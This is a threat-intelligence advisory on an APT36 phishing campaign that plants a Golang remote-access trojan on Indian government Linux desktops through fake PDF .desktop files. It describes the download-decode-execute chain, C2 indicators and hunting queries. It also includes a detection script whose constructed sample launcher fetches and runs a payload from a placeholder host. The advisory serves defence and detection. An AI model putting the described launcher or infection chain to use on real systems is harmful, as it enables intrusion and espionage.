APT36 Deploys Golang DeskRAT Malware via Phishing Against Indian Government Linux Systems
- Rescana
- Oct 26
- 4 min read

Executive Summary
The latest campaign attributed to APT36 (also known as Transparent Tribe, Mythic Leopard, and Earth Karkaddan) demonstrates a significant escalation in the group’s technical sophistication and operational focus. Leveraging a custom Golang-based DeskRAT malware, the threat actor has targeted Indian government and defense entities, specifically those operating Linux-based infrastructure. The infection vector is a highly convincing spearphishing email containing a ZIP archive with a malicious .desktop shortcut file masquerading as a legitimate PDF. Upon execution, this shortcut downloads and deploys the DeskRAT payload from Google Drive, establishes persistence via GNOME autostart, and communicates with a WebSocket-based command and control (C2) server at seemysitelive[.]store. The campaign employs anti-analysis, anti-sandbox, and evasion techniques that make detection and remediation challenging for traditional security controls. This advisory provides a technical breakdown, victimology, and actionable recommendations to mitigate the risk posed by this campaign.
Threat Actor Profile
APT36 is a Pakistan-based advanced persistent threat group active since at least 2013. The group is widely recognized for its persistent cyber-espionage operations against Indian government, military, and critical infrastructure sectors. APT36 is known for its adaptive tactics, including the use of custom malware, social engineering, and leveraging legitimate cloud services for payload delivery and C2. The group’s operational objectives are primarily intelligence gathering, long-term access, and exfiltration of sensitive data. Previous campaigns have targeted Windows environments, but this latest operation marks a notable pivot to Linux, reflecting the group’s evolving capabilities and targeting strategy.
Technical Analysis of Malware/TTPs
The infection chain begins with a spearphishing email containing a ZIP archive. This archive includes a .desktop file, such as PROCUREMENT_OF_MANPORTABLE_&_COMPAC.pdf.desktop, which is crafted to appear as a legitimate PDF document. The file uses a PDF icon and a plausible filename to entice the recipient into execution.
Upon execution, the .desktop file initiates a multi-stage process. First, it leverages curl to download a hex-encoded Golang ELF binary from a Google Drive link (e.g., https://drive.google.com/uc?export=download&id=1VQQiTt78N3KpYJzVbE-95uILnO84Wz_-). The payload is decoded using xxd -r -p and written to /tmp/PROCUREMENT_OF_MANPORTABLE_&_COMPAC.pdf-[timestamp], after which it is made executable and launched in the background. To reduce suspicion, the script simultaneously opens a decoy PDF in Firefox.
Persistence is achieved by configuring the .desktop file for GNOME autostart, ensuring the malware executes upon user login. The DeskRAT payload incorporates anti-debugging and anti-sandboxing routines, complicating analysis and detection. The malware establishes a WebSocket connection to the C2 server at ws://seemysitelive[.]store:8080/ws, retrying every 10 seconds if the connection fails. The C2 server responds with the banner "Welcome to Stealth Server," confirming successful communication.
The campaign’s technical sophistication is further evidenced by its use of obfuscated commands within the .desktop file, large base64-encoded icon data to mask malicious code, and the deployment of Go binaries in ephemeral directories such as /tmp and /var/tmp. These techniques collectively enable the malware to evade signature-based detection and persist within targeted environments.
Exploitation in the Wild
This campaign has been observed actively targeting Indian government and defense organizations, with a particular emphasis on Linux-based infrastructure. The spearphishing emails are themed around procurement and official documentation, increasing the likelihood of user interaction within the intended victim pool. The impact of successful exploitation includes unauthorized access, long-term persistence, data exfiltration, and potential lateral movement within sensitive networks. The use of Google Drive for payload delivery and a non-standard WebSocket C2 channel further complicates detection and response efforts, as these services are often whitelisted or overlooked by conventional security appliances.
Victimology and Targeting
The primary victims of this campaign are Indian government agencies, defense contractors, and associated critical infrastructure entities. The targeting is highly selective, with phishing lures tailored to procurement and operational themes relevant to the Indian public sector. The campaign specifically exploits Linux desktop environments, particularly those running GNOME or similar platforms that support .desktop autostart functionality. Any Linux distribution with user access to execute .desktop files and the presence of curl, xxd, and bash in the user’s PATH is at risk. This includes, but is not limited to, Ubuntu, Debian, Fedora, CentOS, Red Hat, Kali, Mint, and Arch. The attack does not exploit a vendor-specific vulnerability but rather abuses standard Linux desktop features and user behavior.
Mitigation and Countermeasures
Organizations are strongly advised to implement the following countermeasures to mitigate the risk posed by this campaign. First, block all outbound connections to the C2 infrastructure, specifically the domain seemysitelive[.]store, IP address 164.215.103.55, and WebSocket traffic on port 8080. Conduct proactive threat hunting across all Linux endpoints for the provided file hashes, including the ZIP archive, .desktop file, and Golang ELF payload. Search for .desktop files with suspicious Exec fields containing bash -c and curl commands, and identify Go binaries residing in /tmp or /var/tmp.
Enhance email security controls to block ZIP attachments containing .desktop files and flag procurement-themed phishing emails with similar attachment patterns. Employ the following threat hunting queries: find / -name "*.desktop" -exec grep -l "bash -c" {} \; to locate desktop entries that launch a shell wrapper, grep -r "xxd -r -p" /var/log/ to surface any logged use of the hex decoder, and find /tmp /var/tmp -type f -executable -exec file {} \; | grep "Go BuildID" to identify Go binaries in ephemeral directories (file labels Go executables with their Go BuildID). Perform memory analysis on suspicious Go processes to detect active WebSocket connections and embedded configuration data.
User awareness training should emphasize the risks associated with opening unsolicited ZIP attachments and executing files with double extensions (e.g., .pdf.desktop). Where possible, restrict the execution of .desktop files from email attachments and enforce application whitelisting policies. Regularly update endpoint detection and response (EDR) solutions to recognize the latest IOCs and behavioral indicators associated with this campaign.
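The hunting queries above grep for single strings; the script below, an added example that is not part of the advisory or of CloudSEK's report, scores each .desktop entry on the combination of indicators the DeskRAT launcher chains together (shell wrapper, downloader, hex or base64 decoder, ephemeral path) so that a lone bash -c in a legitimate launcher is not reported. The sample entries it writes are constructed for illustration, and the download URL in them is a placeholder rather than a campaign IOC.

```shell
#!/usr/bin/env bash
# Added hunting helper (not from the advisory or from CloudSEK's report):
# flags .desktop entries whose Exec= line chains a shell wrapper with a
# downloader, a hex/base64 decoder or an ephemeral path, the combination the
# DeskRAT launcher relies on. The sample entries below are constructed for
# illustration; the download URL in them is a placeholder, not a campaign IOC.

# Indicators looked for inside an Exec= value. "bash -c" alone is common in
# legitimate launchers, so an entry is reported only when two or more match.
INDICATORS='bash -c|sh -c|curl|wget|xxd -r|base64 -d|chmod \+x|/tmp/|/var/tmp/'

# check_desktop_entry <file>: print one report line and return 0 if the
# entry is suspicious, return 1 otherwise.
check_desktop_entry() {
  local f="$1" exec_line matched n
  exec_line=$(grep -m1 '^Exec=' "$f" 2>/dev/null) || return 1
  matched=$(printf '%s\n' "$exec_line" | grep -oE "$INDICATORS" | LC_ALL=C sort -u)
  n=$(printf '%s\n' "$matched" | grep -c . || true)
  [ "$n" -ge 2 ] || return 1
  printf '%s  indicators=%s  [%s]\n' "$f" "$n" "$(printf '%s\n' "$matched" | paste -sd, -)"
}

# hunt_desktop_entries <dir>: report every suspicious .desktop file under
# <dir>, one per line; return 0 if anything was reported, 1 otherwise.
hunt_desktop_entries() {
  find "$1" -type f -name '*.desktop' 2>/dev/null |
    while IFS= read -r f; do check_desktop_entry "$f"; done | sort | grep .
}

# make_sample_entries <dir>: write three constructed entries, two benign and
# one shaped like the campaign's PDF-lookalike launcher (placeholder URL).
make_sample_entries() {
  local d="$1"
  mkdir -p "$d"
  printf '[Desktop Entry]\nType=Application\nName=Firefox\nExec=firefox %%u\n' \
    > "$d/firefox.desktop"
  printf '[Desktop Entry]\nType=Application\nName=Notes\nExec=bash -c "gedit ~/notes.txt"\n' \
    > "$d/notes.desktop"
  printf '[Desktop Entry]\nType=Application\nName=PROCUREMENT.pdf\nIcon=application-pdf\nExec=bash -c "curl -sL https://example.invalid/p.hex | xxd -r -p > /tmp/p; chmod +x /tmp/p; /tmp/p & firefox /tmp/decoy.pdf"\n' \
    > "$d/PROCUREMENT.pdf.desktop"
}

# Stand-alone use: ./hunt.sh ~/.config/autostart /etc/xdg/autostart ~/Downloads
for dir in "$@"; do hunt_desktop_entries "$dir"; done
```

Point it at ~/.config/autostart and /etc/xdg/autostart to cover the persistence location and at download directories for the initial lure; it complements, rather than replaces, the file-based check for Go binaries in /tmp and /var/tmp.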
References
CloudSEK Investigation Report: https://cloudsek.com/blog/investigation-report-apt36-malware-campaign-using-desktop-entry-files-and-google-drive-payload-delivery
Relevant X (Twitter) Thread: https://x.com/SinghSoodeep/status/1955860231109665108
MITRE ATT&CK for Enterprise: https://attack.mitre.org/groups/G0139/ (APT36/Transparent Tribe)
About Rescana
Rescana delivers advanced third-party risk management (TPRM) solutions, empowering organizations to continuously monitor, assess, and mitigate cyber threats across their extended supply chain. Our platform leverages real-time intelligence, automated risk scoring, and actionable insights to help security teams stay ahead of emerging threats and ensure robust cyber resilience. For more information or to discuss how Rescana can support your organization’s security posture, we are happy to answer questions at ops@rescana.com.